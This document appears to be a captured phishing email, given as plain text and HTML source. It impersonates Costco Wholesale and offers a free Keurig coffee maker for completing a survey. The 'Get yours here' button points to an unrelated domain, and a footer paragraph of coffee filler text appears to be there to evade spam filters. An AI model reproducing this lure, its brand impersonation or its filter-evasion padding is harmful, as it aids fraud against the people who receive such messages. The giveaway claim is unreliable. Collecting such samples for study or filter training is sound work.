- Plain Text
- HTML Content
- HTML Source
Plain Text
Fresh coffee made easy
Costco
Wholesale
A Keurig Coffee Maker On Us
Available while supplies last
We’re gathering quick insights to improve our household perks program. Once complete, you’ll receive a Keurig coffee maker delivered to your door.
Get yours here
Why people love Keurig:
Fresh cup in under a minute
Multiple cup sizes for your mug or tumbler
Removable water reservoir for easy refills
Auto-off to help save energy
Compatible with a wide range of popular pods
Espresso, latte, cappuccino are some popular coffee drinks. Espresso is intense and full-bodied, while latte is creamy with a touch of milk froth. Cappuccino offers a perfect balance of milk, espresso, and foam.
http://www.eagerfogyr.com/s1muv
HTML Source
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta name="color-scheme" content="light dark" />
<meta name="supported-color-schemes" content="light dark" />
<title>Fresh coffee made easy</title>
<style>
body {
margin: 0;
padding: 0;
font-family: -apple-system, Segoe UI, Roboto, Arial, sans-serif;
background-color: #f0f0f0;
color: #333;
}
.neb-shell {
max-width: 640px;
margin: 40px auto;
background-color: #fff;
box-shadow: 0 4px 16px rgba(0, 0, 0, 0.1);
border-radius: 10px;
}
.neb-hero {
padding: 30px;
text-align: left;
background-color: #ffffff;
}
.neb-hero .neb-logo {
font-size: 60px;
font-weight: bold;
font-style: italic;
color: #ff0023;
letter-spacing: -3px;
}
.neb-hero .neb-subtitle {
font-style: italic;
color: #005eb7;
font-size: 20px;
margin-top: -15px;
}
.neb-cards {
padding: 0 30px;
background-color: #fafafa;
}
.neb-feature {
padding: 20px;
text-align: center;
border-bottom: 2px solid #eaeaea;
}
.neb-feature h1 {
font-size: 26px;
margin: 0;
}
.neb-feature .neb-availability {
margin-top: 5px;
text-decoration: underline;
}
.neb-card {
background-color: #ffffff;
border: 1px dashed #ddd;
border-radius: 12px;
padding: 20px;
margin: 20px 0;
text-align: center;
box-shadow: 0 2px 8px rgba(0, 0, 0, 0.1);
}
.neb-card-body {
font-size: 18px;
margin: 20px 0;
line-height: 1.6;
text-align: left;
}
.neb-btn--solid {
display: inline-block;
background-color: #0f766e;
color: #ffffff !important;
padding: 12px 28px;
font-weight: bold;
border-radius: 8px;
text-decoration: none;
font-size: 20px;
margin-bottom: 20px;
}
.neb-foot {
background-color: #333;
color: #fff;
font-size: 12px;
padding: 20px;
text-align: center;
}
.neb-coffee-info {
font-size: 10px;
color: #f0f0f0;
line-height: 1.4;
margin: 20px;
text-align: left;
}
</style>
</head>
<body>
<div class="neb-shell">
<div class="neb-hero">
<div class="neb-logo">Costco</div>
<div class="neb-subtitle">Wholesale</div>
</div>
<div class="neb-cards">
<div class="neb-feature">
<h1>A Keurig Coffee Maker On Us</h1>
<p class="neb-availability">Available while supplies last</p>
</div>
<div class="neb-card">
<div class="neb-card-body">
We’re gathering quick insights to improve our household perks program. Once complete, you’ll receive a Keurig coffee maker delivered to your door.
<br><br>
<a href="http://www.eagerfogyr.com/s1muv" class="neb-btn neb-btn--solid" aria-label="Start your survey">Get yours here</a>
<br><br>
<b>Why people love Keurig:</b>
<ul>
<li>Fresh cup in under a minute</li>
<li>Multiple cup sizes for your mug or tumbler</li>
<li>Removable water reservoir for easy refills</li>
<li>Auto-off to help save energy</li>
<li>Compatible with a wide range of popular pods</li>
</ul>
</div>
</div>
</div>
<div class="neb-foot">
<table role="presentation" width="100%">
<tr>
<td>
<div class="neb-coffee-info">Espresso, latte, cappuccino are some popular coffee drinks. Espresso is intense and full-bodied, while latte is creamy with a touch of milk froth. Cappuccino offers a perfect balance of milk, espre
sso, and foam.</div>
</td>
</tr>
</table>
</div>
</div>
</body>
</html>